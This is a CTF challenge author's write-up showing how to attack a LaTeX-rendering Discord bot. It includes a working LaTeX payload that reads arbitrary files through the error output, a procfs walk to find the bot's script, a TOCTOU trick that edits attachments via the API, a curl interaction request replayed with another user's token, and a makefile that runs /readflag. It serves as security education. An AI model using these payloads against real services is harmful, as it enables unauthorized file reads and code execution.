
TSJ CTF 2022 - Remote Code TeXecution Official Write-up

This is a step-by-step tutorial for my challenge Remote Code TeXecution: hack a Discord bot that processes LaTeX files.

It was originally a black-box challenge with two parts: the first part is to leak the source code, and the second part is to achieve code execution. Because few people were attempting it, I decided to release the source code after a few hours. The white-box version is a lot easier, and part 2 no longer depends on solving part 1.

I released the challenge a bit too late (I was fixing issues involving asyncio and concurrent requests), and it would have had more solves (even with black-box) if I had released it earlier :/.

Part 1: Leaking the source

Intended difficulty: Medium
Guessing required: A little (black-box); None (white-box)
Solve count: 1

How to read a file

We can make the bot render an arbitrary .tex file. Reading files in LaTeX is easy; in fact, there are already a lot of CTF contests that feature LaTeX challenges like this. However, there is a catch in this one: payloads containing backslash characters (hence those with any TeX command) will not produce any output.

After some testing (or reading the code), we may observe that:

  • If our file doesn't compile, the bot sends an error message.
  • Otherwise, if our file contains a backslash, the bot tells us it's insecure.
  • Otherwise, we see the rendered output.

There is a logic error: If we send a file with backslashes that doesn't compile, its error output still gets shown. This means that we can still use commands, but instead of using \input to leak information, we should print stuff to the error output.
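The order of the three checks is the whole bug, so here is a minimal sketch of it. The function name `bot_reply` and its parameters are hypothetical and only model the behaviour observed above; this is not the bot's actual code.

```python
def bot_reply(source: str, compiled_ok: bool, log: str) -> str:
    """Hypothetical model of the three observed cases, in the observed order."""
    if not compiled_ok:
        # The compile error is reported before the backslash check is reached,
        # so anything the payload wrote into the error output leaks.
        return "error: " + log
    if "\\" in source:
        return "insecure"
    return "rendered output"


# A payload with backslashes that fails to compile still gets its log echoed.
print(bot_reply(r"\typeout{! secret}\undefined", False, "! secret"))
```

Checking for backslashes before looking at the compile result would close this particular leak in the model.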

One way to do this is to produce a custom error message with \PackageError. Another way relies on the fact that pdflatex prints errors to stdout in a special format (lines beginning with "! "), so we can do something like \typeout{! abc} to trick the bot into thinking that abc is an error. We may utilize TeX's powerful control flow to read a file like this:

\catcode0=10  % make \0 not produce a syntax error
\catcode9=11  % make \t indents work correctly

\def\n{/path/to/file}
\def\l{69}
\def\r{420}

\newread\file
\openin\file=\n

\newcounter{line}
\makeatletter
\@whilenum\value{line} < \r \do {
    \read\file to \fileline
    \stepcounter{line}
    \ifnum\value{line} > \l
        \typeout{! \fileline}
    \fi
}

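The above payload makes the bot print the 70th to 420th lines of the file /path/to/file (the counter is incremented before it is compared with \l, and the loop stops once the counter reaches \r). There are many other ways to do the same thing, and you can find them in other CTF write-ups.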

Which file to read?

Knowing how to get the contents of a file, the rest is just to determine the bot's file name. There are also many ways to do this, mostly using procfs. For example,

  1. We can brute-force the bot's PID: for each candidate PID, check whether /proc/{PID}/cmdline exists and print it to see if it's the one we want.
  2. We know that the bot must be an ancestor process of LaTeX, so we can read /proc/self/status to see its parent's PID, and read /proc/{PPID}/status to see the parent's PPID, and so on, until we reach the PID 1 process. One of them is the answer.
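Outside of TeX, the second approach amounts to a short loop over procfs. The sketch below is only an illustration of the idea: the helper names (`parse_ppid`, `read_proc`, `ancestor_cmdlines`) are made up here, and the reader function is injectable so the logic can be tried without a real /proc.

```python
from typing import Callable, List, Tuple


def parse_ppid(status_text: str) -> int:
    """Extract the parent PID from the contents of /proc/<pid>/status."""
    for line in status_text.splitlines():
        if line.startswith("PPid:"):
            return int(line.split(":", 1)[1].strip())
    raise ValueError("no PPid line found")


def read_proc(pid, name: str) -> str:
    """Read /proc/<pid>/<name>, turning NUL separators into spaces."""
    with open(f"/proc/{pid}/{name}", "rb") as f:
        return f.read().replace(b"\0", b" ").decode(errors="replace")


def ancestor_cmdlines(start="self",
                      read: Callable[[object, str], str] = read_proc
                      ) -> List[Tuple[int, str]]:
    """Walk from `start` up to PID 1, collecting (pid, cmdline) pairs."""
    result = []
    pid = parse_ppid(read(start, "status"))
    while pid >= 1:
        result.append((pid, read(pid, "cmdline").strip()))
        if pid == 1:
            break
        pid = parse_ppid(read(pid, "status"))
    return result
```

On a Linux machine, `ancestor_cmdlines()` lists the command lines of the calling process's ancestors; one of them would be the bot.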

The second approach can be done entirely in LaTeX:

% make '\t' a token, ignore '\r', and make '\0' a space
\catcode9=\active \catcode13=14 \catcode0=10
\makeatletter

\newcommand\stripprefix[6]{}
% reads the parent pid of the argument and stores it in \@pid
\newcommand\getppid[1]{
    \openin\file=/proc/#1/status
    \@for\tmp:={1,2,3,4,5,6}\do {
        \read\file to\fileline
    }
    \read\file to\ppidline
    \def\@pid{\expandafter\stripprefix\ppidline}
    \closein\file
}
% prints /proc/\@pid/cmdline
\newcommand\print{
    \openin\file=/proc/\@pid/cmdline
    \read\file to\cmdline
    \typeout{! \unexpanded\expandafter{\cmdline}}
    \closein\file
}

\newread\file
\getppid{self}\print
\loop
    \getppid{\@pid}\print
\ifnum\@pid > 1 \repeat

The above yields:

! /bin/sh -c pdflatex -no-shell-escape -jobname output __document.tex | awk '/^
! /,/^\?/' 
! /usr/bin/make -s -C sandbox/ff8e8c9ec1904d9fc299_468420931812065281 -f makefi
le1 stage1 
! /usr/bin/sudo -u latex /usr/bin/make -s -C sandbox/ff8e8c9ec1904d9fc299_46842
0931812065281 -f makefile1 stage1 
! python3 /workdir/4sQ6xQxtIyLHwuLLjjME.py 
! /bin/bash ./entrypoint.sh 
) (./output.aux) )
No pages of output.
Transcript written on output.log.
Output PDF not found.

This means the bot's file is /workdir/4sQ6xQxtIyLHwuLLjjME.py.
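The first line of that output also reveals how the bot extracts errors: pdflatex's output is piped through what appears to be awk '/^! /,/^\?/' (reassembled here from the wrapped line, so treat the exact pattern as an assumption). A rough emulation of that awk range pattern shows why every line starting with "! " is treated as an error. The function name `awk_range` is made up for this sketch.

```python
import re
from typing import Iterable, List


def awk_range(lines: Iterable[str],
              start: str = r"^! ", end: str = r"^\?") -> List[str]:
    """Emulate awk '/start/,/end/': keep each run of lines from a line
    matching `start` through the next line matching `end` (inclusive)."""
    kept = []
    inside = False
    for line in lines:
        if not inside and re.search(start, line):
            inside = True
        if inside:
            kept.append(line)
            if re.search(end, line):
                inside = False
    return kept


log = [
    "This is pdfTeX",
    "! python3 /workdir/bot.py",   # placeholder for a \typeout{! ...} line
    ") (./output.aux) )",
    "No pages of output.",
]
print(awk_range(log))
```

If no line beginning with "?" ever appears, the range stays open until the end of the log, which would explain the trailing pdflatex lines after the leaked command lines.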

Part 2: Arbitrary code execution

Intended difficulty: bruh
Guessing required: A little
Solve count: 0

A race condition

The second part is not actually a LaTeX challenge, since I believe you cannot execute code with -no-shell-escape. As the hint suggests, we should probably upload/create our own makefile. Let's check the different ways this might be possible.

  1. Use LaTeX's \openout to write a file. However, according to the manual:

    If the file does not have an extension then TeX will add a .tex.

    So we can only create a makefile.tex, which doesn't work.
  2. /upload a makefile. The bot checks file extensions, plus Discord replaces all special characters in filenames, so this doesn't work.
  3. Upload a makefile using the direct message feature. Same as 2, it doesn't work. Unless?

Option 3 has a TOCTOU (time-of-check to time-of-use) bug: the bot checks the extension first, and then waits for the user to press the "Yes" button. We may edit the file between these two events to circumvent the check. The Discord client can't edit message attachments, but the API can (see this and this), which means it's actually possible to upload a file with the name makefile1 or makefile2.
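The pattern can be reproduced in a few lines of asyncio. Everything in this sketch is hypothetical (the `Message` class, the handler names, the `.tex` allow-list); it models the check-wait-use shape of the bug rather than the bot's real code. The "fixed" variant is one possible mitigation, not something taken from the challenge.

```python
import asyncio
from dataclasses import dataclass


@dataclass
class Message:
    """Hypothetical stand-in for a Discord message with one attachment."""
    filename: str


def allowed(filename: str) -> bool:
    return filename.endswith(".tex")


async def handle_vulnerable(msg: Message, confirmed: asyncio.Event):
    if not allowed(msg.filename):      # time of check
        return None
    await confirmed.wait()             # the message can be edited while we wait
    return msg.filename                # time of use: reads the mutable state again


async def handle_fixed(msg: Message, confirmed: asyncio.Event):
    name = msg.filename                # snapshot what was actually checked
    if not allowed(name):
        return None
    await confirmed.wait()
    return name


async def demo(handler):
    msg = Message("foo.tex")
    confirmed = asyncio.Event()
    task = asyncio.create_task(handler(msg, confirmed))
    await asyncio.sleep(0)             # let the handler pass its check and block
    msg.filename = "makefile2"         # attacker edits the attachment
    confirmed.set()                    # attacker presses "Yes"
    return await task


print(asyncio.run(demo(handle_vulnerable)))
print(asyncio.run(demo(handle_fixed)))
```

The vulnerable handler ends up using the edited name, while the snapshot variant keeps the name it validated. A real fix would also have to pin the attachment's contents, not just its name.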

Another race condition

The next step is to prevent our makefile from getting overwritten immediately. Let's analyze what the bot does after we select an option:

User selects the option "White Text" for foo.tex
Bot downloads the attachment foo.tex
Bot creates the files __document.tex and makefile2
Bot runs make -f makefile2 stage1
Bot runs make -f makefile2 stage2
Bot sends output

We may notice an exploitable race condition in this process. Consider when a user sends two commands in quick succession, and this happens:

User selects the option "White Text" for foo.tex
User selects the option "White Background" for makefile2
Bot downloads the attachment foo.tex
Bot creates the files __document.tex and makefile2
Bot runs make -f makefile2 stage1
Bot downloads the attachment makefile2
Bot creates the files __document.tex and makefile1
Bot runs make -f makefile1 stage1
Bot runs make -f makefile2 stage2
Bot runs make -f makefile1 stage2
Bot sends output
Bot sends output
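The interleaving above can be simulated with a dictionary standing in for the shared working directory. This is a simplified sketch: `process_file` here is a toy with made-up parameters, the file contents are placeholders, and the events stand in for the time stage1 takes.

```python
import asyncio

BOT_RULES = "bot rules"
ATTACKER_RULES = "attacker rules"


async def process_file(workdir, attachment, makefile, stage1_done, log):
    name, body = attachment
    workdir[name] = body                            # download the attachment
    workdir["__document.tex"] = "generated document"
    workdir[makefile] = BOT_RULES                   # bot writes its own makefile
    await stage1_done.wait()                        # make -f <makefile> stage1
    log.append((makefile, workdir[makefile]))       # stage2 uses the file as it is now


async def race():
    workdir, log = {}, []
    slow, fast = asyncio.Event(), asyncio.Event()
    first = asyncio.create_task(process_file(
        workdir, ("foo.tex", r"\loop\iftrue\repeat"), "makefile2", slow, log))
    await asyncio.sleep(0)      # first job writes makefile2 and blocks in stage1
    second = asyncio.create_task(process_file(
        workdir, ("makefile2", ATTACKER_RULES), "makefile1", fast, log))
    await asyncio.sleep(0)      # second job overwrites makefile2 with the upload
    slow.set()                  # first job's stage1 finally ends
    fast.set()
    await asyncio.gather(first, second)
    return log


print(asyncio.run(race()))
```

In the simulation, the first job's stage2 reads makefile2 after the second job has replaced it with the uploaded attachment.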

It runs the makefile we supplied! This requires the files to all be in the same working directory, so the commands' issuers should be the same. Unfortunately, looking at the code, we can see that the procedure is protected by a mutex lock:

lock = self.locks.get(interaction.user)
if lock == None:
    lock = self.locks[interaction.user] = asyncio.Lock()

async with lock:
    # ...
    # working dir is a hash of ctx.user.id
    await self.process_file(ctx.user.id, self.user_files[ctx.user], makefile)
    # ...

which means that our exploit won't work. Unless?

Discord, what the fuck?

Let's look more closely at the snippet above. The working directory and files depend on ctx.user, and which mutex is used depends on interaction.user. Wait, that's not necessarily the same person! ctx.user is the user who used the /render command, and interaction.user is the user who clicked an option in the select menu.
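A small model makes the mismatch concrete. The `Bot` class below is hypothetical: it keeps the lock lookup from the snippet (keyed by the clicking user) and counts how many jobs are inside the same working directory (keyed by the command's author) at once.

```python
import asyncio


class Bot:
    """Toy model: lock chosen by interaction user, workdir by ctx user."""

    def __init__(self):
        self.locks = {}
        self.active = {}        # workdir -> jobs currently inside it
        self.max_active = 0

    async def on_select(self, ctx_user: str, interaction_user: str):
        lock = self.locks.get(interaction_user)
        if lock is None:
            lock = self.locks[interaction_user] = asyncio.Lock()
        async with lock:
            workdir = f"sandbox/{ctx_user}"
            self.active[workdir] = self.active.get(workdir, 0) + 1
            self.max_active = max(self.max_active, self.active[workdir])
            await asyncio.sleep(0.01)   # stands in for running make
            self.active[workdir] -= 1


async def overlap(clickers):
    bot = Bot()
    await asyncio.gather(*(bot.on_select("user1", c) for c in clickers))
    return bot.max_active


print(asyncio.run(overlap(["user1", "user1"])))
print(asyncio.run(overlap(["user1", "user2"])))
```

When the same user clicks twice, the jobs are serialized; when a second user clicks on user1's menu, two jobs run in user1's directory at the same time.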

Suppose there are two users, user1 and user2. When user1 uses the /render command in a direct message, the bot replies with a message containing a select menu.

Selecting an option is equivalent to sending an API request like this:

curl -X POST https://discord.com/api/v9/interactions \
     -H 'authorization: <user1 auth token>' \
     -H 'content-type: application/json' \
     -d "$payload"

where payload is:

{
    "type": 3,
    "nonce": "...",
    "guild_id": "...",
    "channel_id": "...",
    "message_flags": 64,
    "message_id": "...",
    "application_id": "...",
    "session_id": "...",
    "data": {
        "component_type": 3,
        "custom_id": "...",
        "type": 3,
        "values": ["t"]
    }
}

and we get the desired output from the bot.

Discord says "Only you can see this" under all messages, but is that true? Well, let's try sending the same API request above but with user2's token instead, and change the nonce to another random number. We get 400 Bad Request {"message": "Unknown Channel", "code": 10003}. It says "Unknown Channel", so let's repeat this entire thing in some channel in the TSJ CTF server, which is visible to both users. This time we get 204 No Content???
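Replaying the request under another account only changes the token and the nonce. Here is a sketch that builds (but does not send) such a request with the standard library. The function name `build_select_request` is made up, the "..." fields are left elided exactly as above and would have to be copied from the original request, and using a random 63-bit number for the nonce is an assumption.

```python
import json
import secrets
import urllib.request

API_URL = "https://discord.com/api/v9/interactions"

# Same shape as the payload shown earlier; "..." values are intentionally elided.
TEMPLATE = {
    "type": 3,
    "nonce": "...",
    "guild_id": "...",
    "channel_id": "...",
    "message_flags": 64,
    "message_id": "...",
    "application_id": "...",
    "session_id": "...",
    "data": {"component_type": 3, "custom_id": "...", "type": 3, "values": ["t"]},
}


def build_select_request(token: str, template: dict, value: str) -> urllib.request.Request:
    """Copy the template, refresh the nonce, and pick a select-menu value."""
    payload = dict(template)
    payload["nonce"] = str(secrets.randbits(63))        # assumption: any fresh number
    payload["data"] = dict(template["data"], values=[value])
    return urllib.request.Request(
        API_URL,
        data=json.dumps(payload).encode(),
        headers={"authorization": token, "content-type": "application/json"},
        method="POST",
    )


req = build_select_request("<user2 auth token>", TEMPLATE, "t")
print(req.get_method(), req.full_url)
```

Passing the result to `urllib.request.urlopen` would actually send it; the value "t" is the one from the captured request, and the value for the other menu option is not shown in this write-up.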

This means that user2 has successfully sent an interaction to user1's command response without actually being able to see it. After sending the API request, user2 can in fact see the output of user1's file.

This shows that ctx.user and interaction.user in the previous section can indeed be two different people, thus enabling our race condition exploit.

To sum up, the full exploit is as follows:

  1. /upload a file containing an infinite loop:
    \loop\iftrue\repeat
    
  2. Send a direct message containing any .tex file.
  3. Edit the message in step 2 to contain an attachment makefile2 that says
    stage2:
    	/readflag
    	sleep 8
    	rm -f output.png
    
  4. /render in the TSJ CTF server and select "White Text".
  5. Press the "Yes" button in the bot's reply in step 2.
  6. Using another account's authorization token, select the "White Background" option in step 4.

Steps 4 to 6 have to be done within 10 seconds (before the infinite loop gets killed), and can be carried out either by hand or by using a script. Note that you should pause a bit between the steps because of latency.

Conclusions

  • LaTeX is weird.
  • Python's asyncio is weird.
  • Discord API is weird.